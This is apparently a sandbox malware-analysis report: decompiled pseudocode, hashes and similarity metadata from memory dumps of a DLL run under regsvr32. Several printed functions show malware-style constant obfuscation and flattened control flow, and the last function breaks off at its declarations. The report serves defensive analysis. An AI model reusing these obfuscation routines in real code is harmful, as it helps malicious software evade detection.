                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: -w}$^w$8z
                                                                                                                • API String ID: 0-2264566183
                                                                                                                • Opcode ID: 70022e4a20332d3ef59d5ceec16eb0767f7e5c972c2db16544fb374251f58d0a
                                                                                                                • Instruction ID: e37531ab0be15cb11d50170af7cd344f74b343fb2d7e40286c48096f8bf8af50
                                                                                                                • Opcode Fuzzy Hash: 70022e4a20332d3ef59d5ceec16eb0767f7e5c972c2db16544fb374251f58d0a
                                                                                                                • Instruction Fuzzy Hash: 648162711083419FC758CF21C58A95FBBE2FBD8718F509A2DF29A96260D7B1CA09CB43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001ABB14(intOrPtr* __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				char _v324;
                                                                                                                				char _t162;
                                                                                                                				signed int _t164;
                                                                                                                				void* _t168;
                                                                                                                				signed int _t170;
                                                                                                                				signed int _t171;
                                                                                                                				signed int _t172;
                                                                                                                				signed int _t173;
                                                                                                                				signed int _t174;
                                                                                                                				char* _t175;
                                                                                                                				intOrPtr* _t196;
                                                                                                                				void* _t197;
                                                                                                                				void* _t198;
                                                                                                                
                                                                                                                				_v52 = 0x72e1a8;
                                                                                                                				_v52 = _v52 ^ 0x3f8d814a;
                                                                                                                				_v52 = _v52 ^ 0x3ffa7e90;
                                                                                                                				_v24 = 0x525d37;
                                                                                                                				_v24 = _v24 + 0xffff16d8;
                                                                                                                				_v24 = _v24 >> 5;
                                                                                                                				_v24 = _v24 | 0xd85470c7;
                                                                                                                				_v24 = _v24 ^ 0xd85f6910;
                                                                                                                				_v44 = 0xa07c14;
                                                                                                                				_t196 = __ecx;
                                                                                                                				_t170 = 0x66;
                                                                                                                				_v44 = _v44 / _t170;
                                                                                                                				_v44 = _v44 | 0xfdf39f26;
                                                                                                                				_v44 = _v44 ^ 0xfdf2f261;
                                                                                                                				_v36 = 0x75744c;
                                                                                                                				_v36 = _v36 ^ 0x9f328ce6;
                                                                                                                				_v36 = _v36 + 0xcb73;
                                                                                                                				_v36 = _v36 ^ 0x9f4fbdfc;
                                                                                                                				_v8 = 0xc8d7be;
                                                                                                                				_v8 = _v8 + 0xffffa177;
                                                                                                                				_v8 = _v8 | 0x67decb06;
                                                                                                                				_v8 = _v8 + 0xffffafa5;
                                                                                                                				_v8 = _v8 ^ 0x67dea406;
                                                                                                                				_v32 = 0x2fa657;
                                                                                                                				_t171 = 0x4c;
                                                                                                                				_v32 = _v32 / _t171;
                                                                                                                				_t172 = 0x69;
                                                                                                                				_v32 = _v32 / _t172;
                                                                                                                				_v32 = _v32 ^ 0x000f9ffa;
                                                                                                                				_v16 = 0x417b4e;
                                                                                                                				_v16 = _v16 ^ 0xa7b59008;
                                                                                                                				_v16 = _v16 ^ 0xcd843ba0;
                                                                                                                				_v16 = _v16 + 0xffff502e;
                                                                                                                				_v16 = _v16 ^ 0x6a7e2fb9;
                                                                                                                				_v28 = 0xab023d;
                                                                                                                				_v28 = _v28 << 0x10;
                                                                                                                				_v28 = _v28 ^ 0xee2e9c26;
                                                                                                                				_t173 = 0x72;
                                                                                                                				_v28 = _v28 / _t173;
                                                                                                                				_v28 = _v28 ^ 0x021259e6;
                                                                                                                				_v20 = 0x78f92f;
                                                                                                                				_v20 = _v20 << 0xb;
                                                                                                                				_v20 = _v20 + 0xffff839a;
                                                                                                                				_v20 = _v20 ^ 0xc7cb2a8d;
                                                                                                                				_v12 = 0x23d721;
                                                                                                                				_v12 = _v12 << 0xb;
                                                                                                                				_v12 = _v12 >> 7;
                                                                                                                				_v12 = _v12 + 0xffffc88f;
                                                                                                                				_v12 = _v12 ^ 0x003aac38;
                                                                                                                				_v40 = 0xbb0f78;
                                                                                                                				_v40 = _v40 + 0x2686;
                                                                                                                				_v40 = _v40 ^ 0xba81bda0;
                                                                                                                				_v40 = _v40 ^ 0xba39e082;
                                                                                                                				_v60 = 0x69329d;
                                                                                                                				_t174 = 0x74;
                                                                                                                				_v60 = _v60 / _t174;
                                                                                                                				_v60 = _v60 ^ 0x0008ef4d;
                                                                                                                				_v56 = 0xbf8520;
                                                                                                                				_t175 =  &_v324;
                                                                                                                				_v56 = _v56 * 0x6a;
                                                                                                                				_v56 = _v56 ^ 0x4f4475cc;
                                                                                                                				_v48 = 0xc99b79;
                                                                                                                				_v48 = _v48 + 0xad3d;
                                                                                                                				_v48 = _v48 << 1;
                                                                                                                				_v48 = _v48 ^ 0x019ceb7d;
                                                                                                                				_v64 = 0x1fbae6;
                                                                                                                				_v64 = _v64 * 0x21;
                                                                                                                				_v64 = _v64 ^ 0x041c4917;
                                                                                                                				while(1) {
                                                                                                                					_t162 =  *_t196;
                                                                                                                					if(_t162 == 0) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					if(_t162 == 0x2e) {
                                                                                                                						 *_t175 = 0;
                                                                                                                					} else {
                                                                                                                						 *_t175 = _t162;
                                                                                                                						_t175 = _t175 + 1;
                                                                                                                						_t196 = _t196 + 1;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					L6:
                                                                                                                					_t197 = E001BA5EB( &_v324, _v52, _v24, _v44);
                                                                                                                					if(_t197 != 0) {
                                                                                                                						L8:
                                                                                                                						_t164 = E001B2FAB(_v28, _t196 + 1, _v20, _v12, _v40);
                                                                                                                						_push(_v64);
                                                                                                                						_push(_t197);
                                                                                                                						_push(_v48);
                                                                                                                						_push(_v56);
                                                                                                                						return E001B66C8(_t164 ^ 0x1e6ea728, _v60);
                                                                                                                					}
                                                                                                                					_t168 = E001A31EA(_v36, _v8, _v32,  &_v324, _v16);
                                                                                                                					_t197 = _t168;
                                                                                                                					_t198 = _t198 + 0xc;
                                                                                                                					if(_t197 != 0) {
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					return _t168;
                                                                                                                				}
                                                                                                                				goto L6;
                                                                                                                			}
































                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 7]R$Ltu$N{A
                                                                                                                • API String ID: 0-3184169258
                                                                                                                • Opcode ID: 22fa71c6b708005f2509732b31736f2ff453d5a187519ebed40b0efb6c44d4ca
                                                                                                                • Instruction ID: 4676cfc1833917da8fc203e995afec3adc2d3010a008a34d62db5e97f15a2793
                                                                                                                • Opcode Fuzzy Hash: 22fa71c6b708005f2509732b31736f2ff453d5a187519ebed40b0efb6c44d4ca
                                                                                                                • Instruction Fuzzy Hash: 7F613371C0521AEBDF08CFA5D98A5EEFBB2FF19314F208199E511B6260D7B51A05CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001A7761() {
                                                                                                                				char _v520;
                                                                                                                				signed int _v524;
                                                                                                                				signed int _v528;
                                                                                                                				signed int _v532;
                                                                                                                				signed int _v536;
                                                                                                                				signed int _v540;
                                                                                                                				signed int _v544;
                                                                                                                				signed int _v548;
                                                                                                                				signed int _v552;
                                                                                                                				signed int _v556;
                                                                                                                				signed int _v560;
                                                                                                                				signed int _v564;
                                                                                                                				signed int _v568;
                                                                                                                				signed int _t134;
                                                                                                                				char* _t135;
                                                                                                                				intOrPtr _t137;
                                                                                                                				void* _t141;
                                                                                                                				signed int _t155;
                                                                                                                				signed int _t156;
                                                                                                                				signed int _t157;
                                                                                                                				short* _t160;
                                                                                                                				signed int* _t162;
                                                                                                                
                                                                                                                				_t162 =  &_v568;
                                                                                                                				_v532 = 0x24b94b;
                                                                                                                				_v532 = _v532 ^ 0xff707e79;
                                                                                                                				_t141 = 0xfbe1412;
                                                                                                                				_v532 = _v532 << 0x10;
                                                                                                                				_v532 = _v532 ^ 0xc737a5c5;
                                                                                                                				_v564 = 0x5694a9;
                                                                                                                				_v564 = _v564 * 0x6b;
                                                                                                                				_t155 = 0x68;
                                                                                                                				_v564 = _v564 / _t155;
                                                                                                                				_t156 = 0x5f;
                                                                                                                				_v564 = _v564 / _t156;
                                                                                                                				_v564 = _v564 ^ 0x0001b3a6;
                                                                                                                				_v540 = 0xc61020;
                                                                                                                				_v540 = _v540 << 3;
                                                                                                                				_v540 = _v540 << 0xf;
                                                                                                                				_v540 = _v540 ^ 0x40864049;
                                                                                                                				_v524 = 0xb004ec;
                                                                                                                				_t157 = 0x1a;
                                                                                                                				_v524 = _v524 * 0x11;
                                                                                                                				_v524 = _v524 ^ 0x0bbc2398;
                                                                                                                				_v560 = 0x5eaef3;
                                                                                                                				_v560 = _v560 * 0x2d;
                                                                                                                				_v560 = _v560 >> 7;
                                                                                                                				_v560 = _v560 >> 6;
                                                                                                                				_v560 = _v560 ^ 0x0004cf43;
                                                                                                                				_v536 = 0x45b5c1;
                                                                                                                				_v536 = _v536 / _t157;
                                                                                                                				_v536 = _v536 >> 3;
                                                                                                                				_v536 = _v536 ^ 0x000543c9;
                                                                                                                				_v552 = 0x13dd03;
                                                                                                                				_v552 = _v552 >> 0xb;
                                                                                                                				_v552 = _v552 * 0x71;
                                                                                                                				_v552 = _v552 ^ 0x00014bfe;
                                                                                                                				_v556 = 0x67f268;
                                                                                                                				_v556 = _v556 >> 0xc;
                                                                                                                				_v556 = _v556 + 0xbb15;
                                                                                                                				_v556 = _v556 * 0x42;
                                                                                                                				_v556 = _v556 ^ 0x003812c0;
                                                                                                                				_v544 = 0xc7662b;
                                                                                                                				_v544 = _v544 >> 3;
                                                                                                                				_v544 = _v544 + 0xf350;
                                                                                                                				_v544 = _v544 ^ 0x0016dff5;
                                                                                                                				_v528 = 0xab91fb;
                                                                                                                				_v528 = _v528 ^ 0x3748161d;
                                                                                                                				_v528 = _v528 ^ 0x37e5b25c;
                                                                                                                				_v548 = 0x32613d;
                                                                                                                				_v548 = _v548 << 8;
                                                                                                                				_v548 = _v548 << 7;
                                                                                                                				_v548 = _v548 ^ 0x30973ae5;
                                                                                                                				do {
                                                                                                                					while(_t141 != 0x6034e01) {
                                                                                                                						if(_t141 == 0x6481137) {
                                                                                                                							_t135 = E001C0575(_v532, _v564, __eflags, _t141,  &_v520, _v540);
                                                                                                                							_t162 =  &(_t162[3]);
                                                                                                                							_t141 = 0x6034e01;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t141 == 0xc69c393) {
                                                                                                                							_t137 =  *0x1c4c10; // 0x67d820
                                                                                                                							__eflags = _t137 + 0x20c;
                                                                                                                							return E001A91F2(_v556, _v544, _v528, _t160, _v548, _t137 + 0x20c);
                                                                                                                						}
                                                                                                                						if(_t141 != 0xfbe1412) {
                                                                                                                							goto L15;
                                                                                                                						}
                                                                                                                						_t141 = 0x6481137;
                                                                                                                					}
                                                                                                                					_v568 = 0xcc527e;
                                                                                                                					_v568 = _v568 + 0x2f2a;
                                                                                                                					_v568 = _v568 | 0x82fe02a2;
                                                                                                                					_v568 = _v568 * 0x46;
                                                                                                                					_v568 = _v568 ^ 0xd198007e;
                                                                                                                					_t134 = E001B0184(_v524, _v560,  &_v520, _v536, _v552);
                                                                                                                					_t162 =  &(_t162[3]);
                                                                                                                					_t160 =  &_v520 + _t134 * 2;
                                                                                                                					while(1) {
                                                                                                                						_t135 =  &_v520;
                                                                                                                						__eflags = _t160 - _t135;
                                                                                                                						if(_t160 <= _t135) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						__eflags =  *_t160 - 0x5c;
                                                                                                                						if( *_t160 != 0x5c) {
                                                                                                                							L10:
                                                                                                                							_t160 = _t160 - 2;
                                                                                                                							__eflags = _t160;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						_t114 =  &_v568;
                                                                                                                						 *_t114 = _v568 - 1;
                                                                                                                						__eflags =  *_t114;
                                                                                                                						if( *_t114 == 0) {
                                                                                                                							__eflags = _t160;
                                                                                                                							L14:
                                                                                                                							_t141 = 0xc69c393;
                                                                                                                							goto L15;
                                                                                                                						}
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					goto L14;
                                                                                                                					L15:
                                                                                                                					__eflags = _t141 - 0x5d7b874;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				return _t135;
                                                                                                                			}


























                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: */$=a2$~
                                                                                                                • API String ID: 0-332255120
                                                                                                                • Opcode ID: ae005268946215869e8c5e69cb8fe6cb2a68d3cca99e31459b88624509bd5bb4
                                                                                                                • Instruction ID: ef29f58ebb5660f2f5436d20ee777f9ef652af50974066953457937ea162508d
                                                                                                                • Opcode Fuzzy Hash: ae005268946215869e8c5e69cb8fe6cb2a68d3cca99e31459b88624509bd5bb4
                                                                                                                • Instruction Fuzzy Hash: 215141B54083419BC358CF24C88981FFBE1FBD5798F504A2EF49A96260D3B1CA48CB82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E001B3231(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v4;
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				unsigned int _v40;
                                                                                                                				void* _t89;
                                                                                                                				intOrPtr _t107;
                                                                                                                				void* _t109;
                                                                                                                				signed int _t111;
                                                                                                                				signed int _t112;
                                                                                                                				void* _t122;
                                                                                                                				void* _t123;
                                                                                                                				void* _t124;
                                                                                                                				void* _t125;
                                                                                                                				void* _t126;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t109 = __edx;
                                                                                                                				_t124 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t89);
                                                                                                                				_v12 = 0x9e1bdd;
                                                                                                                				_t126 = _t125 + 0x10;
                                                                                                                				_v12 = _v12 + 0xffffdbfa;
                                                                                                                				_v12 = _v12 ^ 0x0091ddee;
                                                                                                                				_t122 = 0;
                                                                                                                				_v40 = 0x315724;
                                                                                                                				_t123 = 0x9e9303b;
                                                                                                                				_t9 =  &_v40; // 0x315724
                                                                                                                				_t111 = 0x66;
                                                                                                                				_v40 =  *_t9 / _t111;
                                                                                                                				_t112 = 0x47;
                                                                                                                				_v40 = _v40 * 0x5f;
                                                                                                                				_v40 = _v40 >> 4;
                                                                                                                				_v40 = _v40 ^ 0x0002240c;
                                                                                                                				_v16 = 0x950e6a;
                                                                                                                				_v16 = _v16 >> 4;
                                                                                                                				_v16 = _v16 ^ 0x0004f4e3;
                                                                                                                				_v28 = 0xc9a4f1;
                                                                                                                				_v28 = _v28 | 0x09c7a1f0;
                                                                                                                				_v28 = _v28 + 0xb97d;
                                                                                                                				_v28 = _v28 ^ 0x09d6564c;
                                                                                                                				_v4 = 0x7f9b21;
                                                                                                                				_v4 = _v4 * 0x57;
                                                                                                                				_v4 = _v4 ^ 0x2b54a2fc;
                                                                                                                				_v20 = 0x4a24c5;
                                                                                                                				_v20 = _v20 ^ 0xa91ef105;
                                                                                                                				_v20 = _v20 ^ 0x28925536;
                                                                                                                				_v20 = _v20 ^ 0x81c3e501;
                                                                                                                				_v8 = 0xf09817;
                                                                                                                				_v8 = _v8 << 4;
                                                                                                                				_v8 = _v8 ^ 0x0f0c6c3d;
                                                                                                                				_v24 = 0x3764b;
                                                                                                                				_v24 = _v24 + 0xffff0e15;
                                                                                                                				_v24 = _v24 ^ 0x7e60aae8;
                                                                                                                				_v24 = _v24 ^ 0x7e6a1555;
                                                                                                                				_v32 = 0xd377e9;
                                                                                                                				_v32 = _v32 * 0x53;
                                                                                                                				_v32 = _v32 + 0xffff50fb;
                                                                                                                				_v32 = _v32 + 0xaabe;
                                                                                                                				_v32 = _v32 ^ 0x44829b96;
                                                                                                                				_v36 = 0xa4d360;
                                                                                                                				_v36 = _v36 ^ 0xd4623be5;
                                                                                                                				_v36 = _v36 / _t112;
                                                                                                                				_v36 = _v36 * 0x47;
                                                                                                                				_v36 = _v36 ^ 0xd4c62218;
                                                                                                                				do {
                                                                                                                					while(_t123 != 0xc87266) {
                                                                                                                						if(_t123 == 0x1487e0e) {
                                                                                                                							E001B8CF2(_t112);
                                                                                                                							_t123 = 0x9022d31;
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							if(_t123 == 0x9022d31) {
                                                                                                                								E001B17D2(_v32, _v36,  *0x1c4218);
                                                                                                                							} else {
                                                                                                                								if(_t123 == 0x9e9303b) {
                                                                                                                									_push(_t112);
                                                                                                                									_t107 = E001A303A(_t112, 0x2c);
                                                                                                                									_t126 = _t126 + 0xc;
                                                                                                                									 *0x1c4218 = _t107;
                                                                                                                									_t123 = 0xd661d67;
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									if(_t123 != 0xd661d67) {
                                                                                                                										goto L12;
                                                                                                                									} else {
                                                                                                                										if(E001BE5ED() != 0) {
                                                                                                                											_t123 = 0xc87266;
                                                                                                                											continue;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L15:
                                                                                                                						return _t122;
                                                                                                                					}
                                                                                                                					_t112 = _v4;
                                                                                                                					_t122 = E001ABDEB(_t112, _v20, _v8, _v24, _t109, _t124);
                                                                                                                					_t126 = _t126 + 0x10;
                                                                                                                					if(_t122 == 0) {
                                                                                                                						_t123 = 0x1487e0e;
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					goto L15;
                                                                                                                					L12:
                                                                                                                				} while (_t123 != 0xbdc82e9);
                                                                                                                				goto L15;
                                                                                                                			}
























                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $W1$;0$;0
                                                                                                                • API String ID: 0-91903146
                                                                                                                • Opcode ID: 0d6e2efdc71dff4e55242f3d914b4aecbe4259729b601e8b76972b97f3e0bf45
                                                                                                                • Instruction ID: b6465a2d33ac1ab6144c0b0f994076ca915f06c8efee73b3f04f583b95520605
                                                                                                                • Opcode Fuzzy Hash: 0d6e2efdc71dff4e55242f3d914b4aecbe4259729b601e8b76972b97f3e0bf45
                                                                                                                • Instruction Fuzzy Hash: AC5167B180C3419BC358DF25D58A45BBBE0FBD8358F104A2DF89A96261D770CE898F87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E001BCFA0(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				char _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				void* __ecx;
                                                                                                                				void* _t77;
                                                                                                                				signed int _t91;
                                                                                                                				void* _t94;
                                                                                                                				void* _t110;
                                                                                                                				void* _t111;
                                                                                                                				void* _t113;
                                                                                                                				void* _t114;
                                                                                                                
                                                                                                                				_push(_a12);
                                                                                                                				_t110 = __edx;
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				E001AC98A(_t77);
                                                                                                                				_v68 = 0x3d13dc;
                                                                                                                				_t114 = _t113 + 0x14;
                                                                                                                				_v68 = _v68 + 0xffff37a9;
                                                                                                                				_v68 = _v68 << 0x10;
                                                                                                                				_t111 = 0;
                                                                                                                				_t94 = 0x648648f;
                                                                                                                				_t91 = 9;
                                                                                                                				_v68 = _v68 * 0x3c;
                                                                                                                				_v68 = _v68 ^ 0xb3278696;
                                                                                                                				_v72 = 0xad18f7;
                                                                                                                				_v72 = _v72 * 0x27;
                                                                                                                				_v72 = _v72 | 0xb4d7919b;
                                                                                                                				_v72 = _v72 >> 0xb;
                                                                                                                				_v72 = _v72 ^ 0x001f4030;
                                                                                                                				_v76 = 0xd15492;
                                                                                                                				_v76 = _v76 * 0x7d;
                                                                                                                				_v76 = _v76 + 0x806d;
                                                                                                                				_v76 = _v76 ^ 0x99b03997;
                                                                                                                				_v76 = _v76 ^ 0xff889a07;
                                                                                                                				_v80 = 0x265a56;
                                                                                                                				_v80 = _v80 << 7;
                                                                                                                				_v80 = _v80 | 0x3cc0788d;
                                                                                                                				_v80 = _v80 + 0xca1f;
                                                                                                                				_v80 = _v80 ^ 0x3fe75cc9;
                                                                                                                				_v84 = 0x2d111;
                                                                                                                				_v84 = _v84 >> 0xc;
                                                                                                                				_v84 = _v84 / _t91;
                                                                                                                				_v84 = _v84 * 0x2d;
                                                                                                                				_v84 = _v84 ^ 0x000c9f83;
                                                                                                                				_v60 = 0xb69336;
                                                                                                                				_v60 = _v60 + 0xffff8f7c;
                                                                                                                				_v60 = _v60 ^ 0x00b95011;
                                                                                                                				_v64 = 0xe3dc18;
                                                                                                                				_v64 = _v64 + 0x5a36;
                                                                                                                				_v64 = _v64 << 5;
                                                                                                                				_v64 = _v64 ^ 0x1c8e68e2;
                                                                                                                				do {
                                                                                                                					while(_t94 != 0x206608e) {
                                                                                                                						if(_t94 == 0x228f481) {
                                                                                                                							__eflags = E001AA903(_v80, _t110 + 0x1c, __eflags, _v84,  &_v56);
                                                                                                                							if(__eflags != 0) {
                                                                                                                								_t94 = 0xae6af81;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							if(_t94 == 0x648648f) {
                                                                                                                								_t94 = 0x206608e;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								_t119 = _t94 - 0xae6af81;
                                                                                                                								if(_t94 != 0xae6af81) {
                                                                                                                									goto L11;
                                                                                                                								} else {
                                                                                                                									E001AA903(_v60, _t110, _t119, _v64,  &_v56);
                                                                                                                									_t111 =  !=  ? 1 : _t111;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L6:
                                                                                                                						return _t111;
                                                                                                                					}
                                                                                                                					E001A6DD9( &_v56, _v68, _v72, _a4, _v76);
                                                                                                                					_t114 = _t114 + 0xc;
                                                                                                                					_t94 = 0x228f481;
                                                                                                                					L11:
                                                                                                                					__eflags = _t94 - 0xa5675e3;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				goto L6;
                                                                                                                			}




















                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6Z$VZ&$uV
                                                                                                                • API String ID: 0-3689900115
                                                                                                                • Opcode ID: f616f49b9d7bdd31c6dddbbdda0d23d408ccc6974a6b0e82ee55db1157acff6a
                                                                                                                • Instruction ID: 1525c448f76ddb03df012d4440413453f72ece8b262611bf72e11b5e3de08b14
                                                                                                                • Opcode Fuzzy Hash: f616f49b9d7bdd31c6dddbbdda0d23d408ccc6974a6b0e82ee55db1157acff6a
                                                                                                                • Instruction Fuzzy Hash: 0A4175715083429FC758DE21E84A42FBBE5FBD8758F104A1EF18666260E771CA49CF87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E10048DF9(void* __eax, void* __ebx, void* __edx) {
                                                                                                                				_Unknown_base(*)()* _t8;
                                                                                                                
                                                                                                                				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
                                                                                                                				_t8 = SetUnhandledExceptionFilter(E100428E5());
                                                                                                                				 *0x100719a0 = 0;
                                                                                                                				return _t8;
                                                                                                                			}




                                                                                                                0x10048dfe
                                                                                                                0x10048e0e
                                                                                                                0x10048e14
                                                                                                                0x10048e1b

                                                                                                                APIs
                                                                                                                • __decode_pointer.LIBCMT ref: 10048E07
                                                                                                                  • Part of subcall function 100428E5: TlsGetValue.KERNEL32 ref: 100428F2
                                                                                                                  • Part of subcall function 100428E5: TlsGetValue.KERNEL32 ref: 10042909
                                                                                                                  • Part of subcall function 100428E5: RtlDecodePointer.NTDLL(00000001,?,10042CA7,00000000,00000000,1003D0AE,00000000,?,?,00000001,?,?,1003D112,00000001), ref: 1004293C
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 10048E0E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$DecodeExceptionFilterPointerUnhandled__decode_pointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 3433037573-0
                                                                                                                • Opcode ID: 1694735086561c3d0c2e9fe4d53c21587adcff350f741b0175528a127f6e24d4
                                                                                                                • Instruction ID: 8abcfc1f3ce238d97d48462d2802736469083da4d035ff50501f691623c870d9
                                                                                                                • Opcode Fuzzy Hash: 1694735086561c3d0c2e9fe4d53c21587adcff350f741b0175528a127f6e24d4
                                                                                                                • Instruction Fuzzy Hash: 0FC08C0CC182C04BE340C73C9CAC39E7A01AB46040FD8C49DD5C0C10C3CE6C504AC12A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 98%
                                                                                                                			E001B9285() {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				intOrPtr _v108;
                                                                                                                				intOrPtr _v112;
                                                                                                                				short _t245;
                                                                                                                				short _t254;
                                                                                                                				void* _t256;
                                                                                                                				intOrPtr _t279;
                                                                                                                				void* _t280;
                                                                                                                				short* _t281;
                                                                                                                				void* _t282;
                                                                                                                				short* _t283;
